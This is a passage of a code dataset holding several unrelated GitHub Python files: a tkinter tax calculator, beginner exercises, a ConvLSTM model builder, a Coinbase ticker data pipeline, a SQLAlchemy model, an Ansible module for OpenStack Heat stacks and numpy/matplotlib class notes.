textvariable=resultThreeDep, state=DISABLED, font=('arial',10,'bold'), bd=12) \r\n self.txtThreeDep.grid(row=1, column=1)\r\n \r\n self.lblTwoDep = Label(frame2, text='Tax on 2 Deps', font=('arial',10,'bold'), bd=12)\r\n self.lblTwoDep.grid(row=2, column=0)\r\n self.txtTwoDep = Entry(frame2, textvariable=resultTwoDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtTwoDep.grid(row=2, column=1)\r\n\r\n self.lblOneDep = Label(frame2, text='Tax on 1 Dep', font=('arial',10,'bold'), bd=12)\r\n self.lblOneDep.grid(row=3, column=0)\r\n self.txtOneDep = Entry(frame2, textvariable=resultOneDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtOneDep.grid(row=3, column=1)\r\n\r\n self.lblNilDep = Label(frame2, text='Tax on Nil Dep', font=('arial',10,'bold'), bd=12)\r\n self.lblNilDep.grid(row=4, column=0)\r\n self.txtNilDep = Entry(frame2, textvariable=resultNilDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtNilDep.grid(row=4, column=1)\r\n\r\n self.lblNilDep = Label(frame2, text='Tax on Non-Resident', font=('arial',10,'bold'), bd=12)\r\n self.lblNilDep.grid(row=5, column=0)\r\n self.txtNilDep = Entry(frame2, textvariable=resultNonRes, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtNilDep.grid(row=5, column=1)\r\n\r\n self.lblown = Label(frame3, text='Created by Steffny Marif Bill, 15 March 2019. To protect formulae, Dependent rebate is not included.', wraplength=255, font=('arial',9,'bold'), bd=10)\r\n self.lblown.grid(row=1, column=0, columnspan=2) #show creator info by spanning over the columns\r\n \r\n #==========================================================functions=====================================================================================\r\n \r\n def tax_amt():\r\n\r\n n1 = self.txtGrossAmt.get()\r\n n1 = float(n1)\r\n\r\n n = ((n1 * 26) - 200)\r\n tax = 0 \r\n \r\n\r\n if n <= 10000:\r\n tax = 0\r\n elif n >= 10001 and n <= 18000:\r\n tax = (n * 0.22 - 2200)/26\r\n elif n >= 18001 and n <= 33000:\r\n tax = (n * 0.3 - 3640)/26\r\n elif n >= 33001 and n <= 70000:\r\n tax = (n * 0.35 - 5290)/26\r\n elif n >= 70001 and n <= 250000:\r\n tax = (n * 0.4 - 8790)/26\r\n else:\r\n tax = (n * 0.42 - 13790)/26\r\n return tax\r\n\r\n def tax_amt_nonres():\r\n\r\n n2 = self.txtGrossAmt.get()\r\n n2 = float(n2)\r\n\r\n n3 = (n2 * 26)\r\n ntax = 0 \r\n \r\n\r\n if n3 <= 18000:\r\n ntax = (n3 * 0.22)/26\r\n elif n3 >= 18001 and n3 <= 33000:\r\n ntax = (n3 * 0.3 - 1440)/26\r\n elif n3 >= 33001 and n3 <= 70000:\r\n ntax = (n3 * 0.35 - 3090)/26\r\n elif n3 >= 70001 and n3 <= 250000:\r\n ntax = (n3 * 0.4 - 6590)/26\r\n else:\r\n ntax = (n3 * 0.42 - 11590)/26\r\n return ntax\r\n \r\n \r\n\r\n def dep_nil_rebate():\r\n\r\n rAmt1 = tax_amt()\r\n\r\n rAmt = rAmt1 * 26\r\n \r\n \r\n depRebate = 0\r\n \r\n if rAmt <= 0:\r\n depRebate = 0\r\n elif rAmt < 300:\r\n depRebate = (0 * 30) / 26\r\n elif rAmt > 3000:\r\n depRebate = (0 * 300) / 26\r\n else:\r\n depRebate = ((rAmt * 0) / 10) / 26\r\n return depRebate\r\n\r\n def net_tax_nil():\r\n\r\n inc = tax_amt()\r\n inc1 = inc\r\n\r\n d3 = dep_nil_rebate()\r\n dep = d3\r\n\r\n nettx = (inc1 - d3)\r\n\r\n nettax = 0\r\n \r\n if nettx < 0:\r\n nettax = 0\r\n else:\r\n nettax = nettx\r\n return nettax\r\n#================================================================================================================================================\r\n def cal_tax():\r\n\r\n inc = (amt.get())\r\n ginc = float(inc)\r\n\r\n tax1 = tax_amt()\r\n tax2 = (tax1)\r\n \r\n taxnonres = tax_amt_nonres()\r\n taxnon = 
(taxnonres)\r\n\r\n \r\n if isinstance(ginc, float):\r\n\r\n dep0con = net_tax_nil()\r\n dep0 = round(float(dep0con), 2)\r\n resultNilDep.set(dep0) #display dependent rebate in Nil dep field\r\n\r\n nonrescon = float(taxnon)\r\n nonres = round((nonrescon), 2)\r\n resultNonRes.set(nonres) #display dependent rebate in Non resident field\r\n return True\r\n \r\n \r\n \r\n#================================================================================================================================================\r\n #clear data in fields when reset button is clicked \r\n def reset():\r\n amt.set(\"\")\r\n resultThreeDep.set(\"\")\r\n resultTwoDep.set(\"\")\r\n resultOneDep.set(\"\")\r\n resultNilDep.set(\"\")\r\n resultNonRes.set(\"\")\r\n\r\n #close the app when exit button is clicked\r\n def wexit():\r\n close = tkinter.messagebox.askyesno(\"PNG Income Tax Calculator - 2012\", \"Do you want to exit?\")\r\n if close > 0:\r\n root.destroy()\r\n return \r\n \r\n #create the buttons and set the functions that each button will compute when clicked\r\n self.btnCal = Button(frame3, text='Calculate', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=6, command=cal_tax).grid(row=0,column=0)\r\n self.btnReset = Button(frame3, text='Reset', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=5, command=reset).grid(row=0,column=1)\r\n self.btnExit = Button(frame3, text='Exit', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=6, command=wexit).grid(row=0,column=2)\r\n \r\n\r\n\r\n\r\nif __name__=='__main__':\r\n root=Tk()\r\n app = CalTax(root)\r\n root.mainloop()\r\n\r\n \r\n","repo_name":"steffny1/Income-Tax-Calculator-_-Python-GUI","sub_path":"taxcal2012- Copy.py","file_name":"taxcal2012- Copy.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13548914560","text":"#_*_coding:utf-8_*_\n\ndef cf():\n for i in range(1, 10):\n for j in range(1, 1+i):\n print('{}x{}={}\\t'.format(i, j, i*j), end='')\n\ndef dfh(num1, num2):\n a = num1 % num2\n b = (num1-1) / num2\n return b, a\n\nif __name__ == \"__main__\":\n cf()\n num2, num1 = dfh(9,4)\n tuple1 = dfh(9, 4)\n print(num1, num2)\n print(tuple1)\n\n for char in 'liangdianshui':\n print(char)","repo_name":"LoveAniuniu/python-learning","sub_path":"20190514/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33241812926","text":"# CSS 언어란???\n'''\n적용방법\n- 적용할 태그에 style 속성으로 넣기\n- HTML 문서 안에

QUIZ

'\n part_1 = '
'\n part_2 = '

'\n part_3 = '


0:\n model.add(tf.keras.layers.SpatialDropout3D(rec.dropout))\n rec_layer = tf.keras.layers.ConvLSTM2D(\n filters=rec.filters,\n kernel_size=rec.kernel_size,\n activation=rec.activation,\n recurrent_activation=rec.recurrent_activation,\n strides=rec.strides,\n bias_regularizer=rec.bias_reg,\n kernel_regularizer=rec.kernel_reg,\n activity_regularizer=rec.act_reg,\n return_sequences=index < len(self.rec) - 1,\n )\n model.add(rec_layer)\n if rec.normalization:\n model.add(tf.keras.layers.BatchNormalization())\n if rec.noise > 0:\n model.add(tf.keras.layers.GaussianNoise(rec.noise))\n\n create_flatten(self.flatten, model)\n create_deep(self.deep, model)\n\n model.add(tf.keras.layers.Dense(1))\n return model\n","repo_name":"Darono87/Hyperview_Challenge","sub_path":"creators/CLSTMCreator.py","file_name":"CLSTMCreator.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20253215085","text":"from turtle import Turtle\nMOVE_DISTANCE = 20\nUP = 90\nDOWN = 270\n\n\nclass Paddle(Turtle):\n def __init__(self, x, y):\n super().__init__()\n self.create(x, y)\n\n def create(self, x, y):\n self.shape('square')\n self.color('white')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n self.goto(x, y)\n self.speed('fastest')\n\n def go_up(self):\n if self.ycor() < 275:\n new_y = self.ycor() + 20\n new_position = (self.xcor(), new_y)\n self.goto(new_position)\n\n\n def go_down(self):\n if self.ycor() > -275:\n new_y = self.ycor() - 20\n new_position = (self.xcor(), new_y)\n self.goto(new_position)","repo_name":"pearl178/pongGame","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35172689376","text":"import argparse\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Queue\n#from recordclass import recordclass\nimport collections\nimport pandas as pd\nimport numpy as np\nimport json\nimport cbpro\nimport time\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, Sampler\n\n\nclass TickerStream:\n\n def __init__(self, products, source=None, window=600):\n self.products = products\n if source is None:\n self.stream = self.stream_tickers_live()\n elif isinstance(source, str):\n self.stream = self.stream_tickers(source)\n else:\n stream = (self.stream_tickers(path) for path in source)\n self.stream = (i for it in stream for i in it)\n self.window = window\n\n\n def stream_tickers_live(self, doraise=False):\n wsClient = TickerClient(products=self.products)\n wsClient.start()\n print(wsClient.url, wsClient.products)\n try:\n while True:\n if wsClient.queue.empty():\n time.sleep(1)\n else:\n yield wsClient.queue.get()\n except KeyboardInterrupt:\n wsClient.close()\n if doraise:\n raise KeyboardInterrupt\n #if wsClient.error:\n\n\n def stream_tickers(self, path):\n try:\n with open(path, 'r') as f:\n for l in f:\n msg = json.loads(l)\n if msg['type'] == 'ticker' and 'time' in msg:\n if self.products is None or msg['product_id'] in self.products:\n yield self.process_ticker_message(msg)\n except:\n print(f'could not stream tickers! 
(\"{path}\")')\n raise\n\n\n ticker_meta_keys = ('product_id', 'time')\n ticker_sample = collections.namedtuple('TickerSample',\n ticker_meta_keys + ('X', ))\n #ticker_feature_keys = ('high_24h', 'low_24h',\n ticker_feature_keys = ('best_ask', 'best_bid', 'high_24h', 'low_24h',\n 'open_24h', 'price', 'volume_24h', 'volume_30d')\n #ticker_feature_keys = ('high_24h', 'low_24h', 'price', 'volume_24h')\n #ticker_feature_keys = ('price', )\n ticker_feature_count = len(ticker_feature_keys)\n ticker_price_index = ticker_feature_keys.index('price')\n ticker_date_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n\n def process_ticker_message(self, msg):\n msg['time'] = datetime.strptime(msg['time'], self.ticker_date_format)\n features = np.array([float(msg[key]) for key in self.ticker_feature_keys])\n meta = tuple(msg[key] for key in self.ticker_meta_keys) + (features, )\n return self.ticker_sample(*meta)\n\n\n def __iter__(self):\n stream = self.stream_batches(self.stream, self.products, self.window)\n queue = []\n for sample in stream:\n queue.append(sample)\n if len(queue) == self.window:\n snapshot = pd.DataFrame.from_records(queue,\n columns=tickers.batch_sample._fields)\n yield (self._collate(snapshot), snapshot.iloc[-1].prices)\n queue.pop(0)\n\n\n @staticmethod\n @torch.no_grad()\n def _collate(snapshot):\n frames = []\n for i, snap in enumerate(snapshot.itertuples(index=False)):\n fs = snap.features\n frames.append((fs - fs.mean()) / fs.std())\n frames = np.array([frames])\n frames = torch.FloatTensor(frames).transpose(0, 1)\n return frames\n\n\n batch_meta_keys = ('time', 'mass', 'purity', 'Y', 'edge')\n batch_sample = collections.namedtuple('Sample', batch_meta_keys + ('X', ))\n\n\n def tickers_df(self):\n return pd.DataFrame.from_records(self.stream_batches(),\n columns=self.batch_sample._fields)\n\n\n def stream_batches(self):\n zero = lambda : np.zeros(len(self.ticker_feature_keys))\n self._cached = collections.defaultdict(zero)\n for time, batch in self.stream_buffer():\n if batch:\n batch_products = set(s.product_id for s in batch)\n mass = len(batch)\n purity = (len(batch_products) / len(self.products))\n prices, features = self.collate_ticker_samples(batch)\n yield self.batch_sample(time, mass, purity, prices, False, features)\n else:\n yield self.batch_sample(time, 0.0, 0.0, None, True, None)\n\n\n def collate_ticker_samples(self, batch):\n by_product_id = collections.defaultdict(list)\n for sample in batch:\n by_product_id[sample.product_id].append(sample.X)\n for product in self.products:\n if not by_product_id[product]:\n by_product_id[product].append(self._cached[product])\n product_features = [np.array(by_product_id[p]) for p in sorted(by_product_id)]\n product_features = [np.mean(pfs, axis=0) for pfs in product_features]\n prices = []\n g = zip(sorted(self.products), product_features)\n for j, (product, features) in enumerate(g):\n self._cached[product] = features\n prices.append(features[self.ticker_price_index])\n features = np.concatenate(product_features)\n return prices, features\n\n\n def stream_buffer(self):\n start = next(self.stream).time\n start = start - timedelta(\n seconds=start.second,\n microseconds=start.microsecond)\n buffer = []\n checkpoint = start + timedelta(seconds=self.window)\n for ticker in self.stream:\n if ticker.time > checkpoint:\n # TODO: do raise during inference and to loop restarting?\n #assert buffer\n yield checkpoint, buffer\n buffer = []\n checkpoint += timedelta(seconds=self.window)\n else:\n buffer.append(ticker)\n\n\nclass 
TickerClient(cbpro.WebsocketClient):\n\n def on_open(self):\n self.url = \"wss://ws-feed.pro.coinbase.com/\"\n self.channels = ['ticker']\n self.message_count = 0\n self.queue = Queue()\n\n\n def on_message(self, msg):\n self.message_count += 1\n self.queue.put(json.dumps(msg, sort_keys=True))\n\n\n def on_close(self):\n print(\"MessageCount = %i\" % self.message_count)\n print(\"-- Goodbye! --\")\n\n\n def on_error(self, *ags, **kws):\n super().on_error(*ags, **kws)\n self.stop = False\n\n\nclass TickerDataset(Dataset):\n \"\"\"Given an input time-series of feature vectors,\n approximate the gradient of a different output time-series of feature vectors.\n\n In context, the input time-series contains available live ticker data for a set\n of products (e.g. BTC-USD, ETH-USDC). The output time-series consists of price\n data for the same set of products. Thus this class is for approximating the\n direction of future price changes for a set of products given a recent history\n of ticker data about those products.\n\n Args:\n df (pd.DataFrame): Time-series where each entry has fields {time, X, Y}.\n window (int): How many recent frames (X) are used as the input time-series.\n stride (int): How many future frames (Y) are used as the output time-series.\n\n \"\"\"\n\n epsilon = 0.00001\n\n def __init__(self, df, window=6, stride=6):\n self.df = df\n self.window = window\n self.stride = stride\n\n\n def __getitem__(self, index):\n snapshot = self.df[index:index + self.window + self.stride]\n frames, targets = [], []\n for i, snap in enumerate(snapshot.itertuples(index=False)):\n if i < self.window:\n frames.append(snap.X)\n if i >= self.window - 1:\n targets.append(snap.Y)\n frames, targets = np.array(frames), np.array(targets)\n f_mean, f_std = frames.mean(axis=0), frames.std(axis=0)\n frames = np.array([((f - f_mean) / (f_std + self.epsilon)) for f in frames])\n #targets = 1 * (np.gradient(targets, axis=0).mean(axis=0) > 0)\n targets = 1 * (targets[-1] > targets[0])\n return frames, targets\n\n\n @torch.no_grad()\n def _collate(self, samples):\n frames, targets = zip(*samples)\n frames = torch.FloatTensor(frames).transpose(0, 1)\n targets = torch.LongTensor(targets).transpose(0, 1)\n return frames, targets\n\n\n def __len__(self):\n return self.df.shape[0] - self.window - self.stride\n\n\nclass TickerSampler(Sampler):\n\n def __init__(self, dataset, resample=False, products=None):\n self.ids = []\n self.bins = [[[] for x in range(2)] for product in products]\n print(len(dataset), dataset.df.shape)\n edgecount = 0\n for x in np.arange(len(dataset)):\n snapshot = dataset.df[x:x + dataset.window + dataset.stride]\n if not snapshot.edge.values.any():\n self.ids.append(x)\n inputs, targets = dataset[x]\n for y, target in enumerate(targets):\n self.bins[y][target.item()].append(x)\n else:\n edgecount += 1\n self.n_samples = len(self.ids)\n self._iteration = -1\n print(f'edges: {edgecount}')\n for product, bins in zip(products, self.bins):\n print(f'Product: {product}')\n for cls in range(len(bins)):\n print(f'cls: {cls}, cnt: {len(bins[cls])}')\n self.resample = resample\n\n\n def __iter__(self):\n self._iteration += 1\n rng = np.random.RandomState(self._iteration)\n if self.resample:\n n_samples_per_class = 10000\n pivot = 0\n bins = self.bins[pivot]\n index = []\n for target_bin in bins:\n chunk = rng.permutation(target_bin)\n chunk = chunk[:min(len(chunk), n_samples_per_class)]\n index.extend(chunk)\n else:\n index = self.ids\n return iter(rng.permutation(index))\n\n\n def __len__(self):\n return 
self.n_samples\n\n\nclass TickerDataLoader(DataLoader):\n\n def __init__(self, dataset, device=None, resample=False, products=None, **kws):\n sampler = TickerSampler(dataset, resample=resample, products=products)\n super().__init__(dataset,\n sampler=sampler,\n collate_fn=dataset._collate,\n **kws)\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.device = device\n\n\n def __iter__(self):\n for batch, targets in super().__iter__():\n yield batch.to(self.device), targets.to(self.device)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n\t\tdescription='Utility for aggregating ticker data')\n parser.add_argument('--output', default='stream.log',\n help='Path to store ticker data')\n parser.add_argument('--products', default='products.txt',\n help='Path to list of targeted products')\n args = parser.parse_args()\n\n with open(args.products, 'r') as f:\n products = [l.strip() for l in f.readlines() if not l.startswith('#')]\n products = [l for l in products if l]\n\n with open(args.output, 'w') as f:\n for j, ticker in enumerate(stream_tickers_live(products=products)):\n f.write(f'{ticker}\\n')\n print(f'tickers: {j}', end='\\r')\n","repo_name":"ctogle/coind","sub_path":"coind/data/tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22606857489","text":"from sqlalchemy import Table, or_\nfrom sqlalchemy.sql.functions import sum\n\nfrom common.database import db_connect\nfrom app.config.config import config\nfrom app.settings import env\nfrom model.notification import Notification\n# from model.article import Article\nfrom model.user import User\n\nengine, db_session, Base = db_connect()\n\n\nclass Praise(Base):\n __table__ = Table('praise', Base.metadata, autoload_with=engine)\n\n def calc_praised_num(self, aid):\n praised_num = db_session.query(sum(Praise.praised)).filter_by(aid=aid, praised=1, is_valid=1).first()\n # print(praised_num, type(praised_num))\n # print('點讚數:', praised_num[0])\n return praised_num[0]\n\n def update_status(self, uid, aid, praised=0):\n\n row = db_session.query(Praise).filter_by(\n uid=uid,\n aid=aid,\n is_valid=1\n ).first()\n\n if not row:\n praise = Praise(\n uid=uid,\n aid=aid,\n praised=praised\n )\n db_session.add(praise)\n else:\n row.praised = praised\n # article_row.praised = praised\n db_session.commit()\n # 計算獲讚數\n praised_num = self.calc_praised_num(aid)\n # print('點讚數:', int(praised_num))\n return praised_num\n\n def get_praise_status(self, uid, aid):\n praised = db_session.query(Praise.praised).filter_by(uid=uid, aid=aid).first()\n if not praised:\n return 0\n return praised[0]\n","repo_name":"ziliang-wang/buhuman","sub_path":"model/praise.py","file_name":"praise.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23131593090","text":"from terra_sdk.client import lcd\nfrom terra_sdk.core import coin\n\nimport anchorpy\nfrom anchorpy import exchange\n\nif __name__ == \"__main__\":\n CHAIN_ID = \"tequila-0004\"\n # CHAIN_ID = \"columbus-4\"\n LCD = lcd.LCDClient(\n chain_id=CHAIN_ID, url=anchorpy.settings.PUBLIC_NODE_URLS[CHAIN_ID]\n )\n\n print(\n f\"1 aUST = {anchorpy.coin_to_human_str(exchange.uaust_to_uusd(LCD, coin.Coin('uaust', 1e6)), decimals=8)}\" # noqa\n )\n print(\n f\"1 bLuna = {anchorpy.coin_to_human_str(exchange.ubluna_to_uusd(LCD, 
coin.Coin('ubluna', 1e6)), decimals=8)}\" # noqa\n )\n print(\n f\"1 ANC = {anchorpy.coin_to_human_str(exchange.uanc_to_uusd(LCD, coin.Coin('uanc', 1e6)), decimals=8)}\" # noqa\n )\n","repo_name":"Matthew-Jennings/anchorpy","sub_path":"scripts/print_rates.py","file_name":"print_rates.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"28398128894","text":"#!/usr/bin/python\n#coding: utf-8 -*-\n\ntry:\n import time\n from keystoneclient.v2_0 import client as ksclient\n from heatclient.client import Client as hclient\n from heatclient.common import template_utils\n from heatclient.common import utils\n from heatclient import exc\nexcept ImportError:\n print(\"failed=True msg='heatclient and keystoneclient is required'\")\n\nDOCUMENTATION = '''\n---\nmodule: os_stack\n - Create, update, list, show, delete and debug failure on heat stack deployment\noptions:\n login_username:\n description:\n - login username to authenticate to keystone\n required: true\n default: admin\n login_password:\n description:\n - Password of login user\n required: true\n default: True\n login_tenant_name:\n description:\n - The tenant name of the login user\n required: true\n default: True\n auth_url:\n description:\n - The keystone URL for authentication\n required: false\n default: 'http://127.0.0.1:35357/v2.0/'\n region_name:\n description:\n - Name of the region\n required: false\n default: None\n state:\n description:\n - Indicate desired state of the resource\n choices: ['create', 'update', 'list', 'show', 'delete', 'debug']\n default: present\n stack_name:\n description:\n - Name of the stack that should be created\n required: true\n default: None\n template:\n description:\n - Path of the template file to use for the stack creation\n required: false\n default: None\n environment_files:\n description:\n - List of environment files that should be used for the stack creation\n required: false\n default: None\nrequirements: [\"heatclient\", \"keystoneclient\"]\n'''\n\nEXAMPLES = '''\n# Create a stack with given template and environment files\n - name: create stack\n heat_stack:\n login_username: admin\n login_password: admin\n auth_url: \"http://192.168.1.14:5000/v2.0\"\n tenant_name: admin\n stack_name: test\n state: create\n template: \"/home/stack/ovb/templates/quintupleo.yaml\"\n environment_files: ['/home/stack/ovb/templates/resource-registry.yaml','/home/stack/ovb/templates/env.yaml']\n\n - name: delete stack\n heat_stack:\n stack_name: test\n state: delete\n login_username: admin\n login_password: admin\n auth_url: \"http://192.168.1.14:5000/v2.0\"\n tenant_name: admin\n'''\n\ndef obj_gen_to_dict(gen):\n \"\"\"Enumerate through generator of object and return lists of dictonaries.\n \"\"\"\n obj_list = []\n for obj in gen:\n obj_list.append(obj.to_dict())\n return obj_list\n\n\nclass Stack(object):\n\n def __init__(self, kwargs):\n self.client = self._get_client(kwargs)\n\n def _get_client(self, kwargs, endpoint_type='publicURL'):\n \"\"\" get heat client \"\"\"\n kclient = ksclient.Client(**kwargs)\n token = kclient.auth_token\n endpoint = kclient.service_catalog.url_for(service_type='orchestration',\n endpoint_type=endpoint_type)\n kwargs = {\n 'token': token,\n }\n return hclient('1', endpoint=endpoint, token=token)\n\n def create(self, name,\n template_file,\n env_file=None,\n format='json'):\n \"\"\" create heat stack with the given template and environment files \"\"\"\n self.client.format = format\n 
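# NOTE (assumption, based on heatclient's documented helpers, not stated in\n# this file): get_template_contents() returns (files_map, parsed_template) and\n# process_multiple_environments_and_files() merges the env files into a single\n# environment dict plus their raw contents; both maps are combined below.\n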
tpl_files, template = template_utils.get_template_contents(template_file)\n env_files, env = template_utils.process_multiple_environments_and_files(env_paths=env_file)\n\n try:\n stack = self.client.stacks.create(stack_name=name,\n template=template,\n environment=env,\n files=dict(list(tpl_files.items()) + list(env_files.items())),\n parameters={})\n uid = stack['stack']['id']\n\n stack = self.client.stacks.get(stack_id=uid).to_dict()\n while stack['stack_status'] == 'CREATE_IN_PROGRESS':\n stack = self.client.stacks.get(stack_id=uid).to_dict()\n time.sleep(5)\n if stack['stack_status'] == 'CREATE_COMPLETE':\n return stack\n else:\n return (False)\n except exc.HTTPBadRequest as e:\n return (False, e)\n\n def list(self):\n \"\"\" list created stacks \"\"\"\n fields = ['id', 'stack_name', 'stack_status', 'creation_time',\n 'updated_time']\n uids = []\n stacks = self.client.stacks.list()\n utils.print_list(stacks, fields)\n return obj_gen_to_dict(stacks)\n\n def delete(self, name):\n \"\"\" delete stack with the given name \"\"\"\n self.client.stacks.delete(name)\n return self.list()\n\n def get(self, name):\n \"\"\" show stack \"\"\"\n return self.client.stacks.get(name)\n\n def get_id(self, name):\n \"\"\" get stack id by name \"\"\"\n stacks = self.client.stacks.list()\n while True:\n try:\n stack = stacks.next()\n if name == stack.stack_name:\n return stack.id\n except StopIteration:\n break\n return False\n\nclass Resource(object):\n\n def __init__(self, kwargs):\n self.client = self._get_client(kwargs)\n\n def _get_client(self, kwargs, endpoint_type='publicURL'):\n \"\"\" get heat client \"\"\"\n kclient = ksclient.Client(**kwargs)\n token = kclient.auth_token\n endpoint = kclient.service_catalog.url_for(service_type='orchestration',\n endpoint_type=endpoint_type)\n kwargs = {\n 'token': token,\n }\n return hclient('1', endpoint=endpoint, token=token)\n\n def list(self, name):\n return [ res for res in self.client.resources.list(stack_id=name) ]\n\n def get(self, name, status='CREATE_COMPLETE', nested_depth=0):\n return [ res for res in self.client.resources.list(stack_id=name, nested_depth=nested_depth) if status in res.resource_status ]\n\n def get_software_deployment_by_id(self, id):\n try:\n deployment = self.client.software_deployments.get(id)\n return [(deployment.server_id, deployment.output_values['deploy_stderr'], deployment.status_reason)]\n except exc.HTTPNotFound:\n pass\n\n def get_software_deployment_by_status(self, status='FAILED'):\n return [ res for res in self.client.software_deployments.list() if status in res.resource_status ]\n\n def debug_deployment(self, name):\n # get failed resource\n failed_resource = self.get(name=name, status='FAILED', nested_depth=5)\n # get software_deployment\n failure = []\n for res in failed_resource:\n failure.append(self.get_software_deployment_by_id(res.physical_resource_id))\n return failure\n\n def debug_stack(self, name):\n # return all failed resources\n failed_resource = self.get(name=name, status='FAILED', nested_depth=5)\n return [ (res.resource_name, res.resource_status_reason, res.resource_type) for res in failed_resource ]\n\n\ndef main():\n argument_spec = openstack_argument_spec()\n argument_spec.update(dict(\n stack_name = dict(required=True),\n template = dict(default=None),\n environment_files = dict(default=None, type='list'),\n state = dict(default='create', choices=['create', 'update', 'delete', 'list', 'show', 'debug']),\n tenant_name = dict(default=None),\n timeout = dict(default=180),\n ))\n module = 
AnsibleModule(argument_spec=argument_spec)\n    state = module.params['state']\n    stack_name = module.params['stack_name']\n    template = module.params['template']\n    environment_files = module.params['environment_files']\n    kwargs = {\n        'username': module.params['login_username'],\n        'password': module.params['login_password'],\n        'tenant_name': module.params['tenant_name'],\n        'auth_url': module.params['auth_url']\n    }\n\n    stack = Stack(kwargs)\n\n    if module.params['state'] == 'create':\n        stack_id = stack.get_id(stack_name)\n        if not stack_id:\n            stack = stack.create(name=stack_name,\n                                 template_file=template,\n                                 env_file=environment_files)\n            if not isinstance(stack, dict):  # create() returns a dict only on CREATE_COMPLETE\n                module.fail_json(msg=\"Failed to create stack\", result = \"failed\")\n            module.exit_json(changed = True, result = \"created\" , stack = stack)\n        else:\n            module.exit_json(changed = False, result = \"success\" , id = stack_id)\n    elif module.params['state'] == 'update':\n        module.exit_json(changed = False, result = \"Not implemented yet\")\n    elif module.params['state'] == 'delete':\n        stack_id = stack.get_id(stack_name)\n        if not stack_id:\n            module.exit_json(changed = False, result = \"success\")\n        else:\n            stack.delete(stack_name)\n            module.exit_json(changed = True, result = \"deleted\")\n    elif module.params['state'] == 'list':\n        stack_list = stack.list()\n        module.exit_json(changed = True, result = \"list\" , stack_list = stack_list)\n    elif module.params['state'] == 'show':\n        stack_show = stack.get(stack_name)\n        module.exit_json(changed = True, result = \"show\" , stack_show = stack_show)\n    elif module.params['state'] == 'debug':\n        resource = Resource(kwargs)\n        failed_resource = resource.debug_stack(stack_name)\n        failed_deployment = resource.debug_deployment(stack_name)\n        module.exit_json(changed = True, result = \"debug\" , failed_resource = failed_resource, failed_deployment = failed_deployment)\n\nfrom ansible.module_utils.basic import *\nfrom ansible.module_utils.openstack import *\nif __name__ == '__main__':\n    main()\n","repo_name":"matbu/ansible-role-tripleo-heat-stack","sub_path":"library/os_stack.py","file_name":"os_stack.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33898167546","text":"## _________________ numpy ___________________##\n\nimport numpy as np\n\n## EXAMPLE 1: complex number\n\ndef quad_real_roots(a, b, c):\n    D = b**2 - 4*a*c\n    x1 = (-b + D**0.5)/(2*a)\n    x2 = (-b - D**0.5)/(2*a)\n    return x1, x2\n\nprint(quad_real_roots(2, -1, -3))\n\ndef quad_complex_roots(aR, bR, cR):\n    a = complex(aR, 0)  # use the built-in complex; np.complex is deprecated/removed in modern NumPy\n    b = complex(bR, 0)\n    c = complex(cR, 0)\n    D = b ** 2 - 4 * a * c\n    x1 = (-b + np.sqrt(D))/(2*a)\n    x2 = (-b - np.sqrt(D))/(2*a)\n    return x1, x2\n\nprint(quad_complex_roots(1, 2, 5))\n\n\n## EXAMPLE 2: arrays\nm1 = 0.5\nb1 = 0.5\nm2 = -1\nb2 = 2\n\nA = np.array([[-m1, 1], [-m2, 1]]) # note the extra pair of [] wrapping the rows (2-D array)\nb = np.array([[b1], [b2]])\nprint(A)\nprint(np.shape(A)) # check the array's shape\n\nA_inv = np.linalg.inv(A) # invert the matrix\nprint(A_inv)\n\nX = np.dot(A_inv, b) # matrix multiplication\nprint(X)\n\n\n## _________________ matplotlib ___________________##\n\nimport matplotlib.pyplot as plt\nx_1 = np.linspace(-2, 6, 11) # evenly spaced values (start, stop, count)\nprint(x_1)\ny_1 = m1*x_1 + b1\n\nx_2 = x_1\ny_2 = m2*x_2 + b2\n\nplt.plot(x_1, y_1, color = 'magenta', linewidth = 3)\nplt.plot(x_2, y_2)\n\nplt.legend(['y = 0.5x+0.5 ', 'y=-x+2'])\nplt.grid()\nplt.show()\n\n\n","repo_name":"Wenfei-Shen/Python2020","sub_path":"Class Note 4.py","file_name":"Class Note 
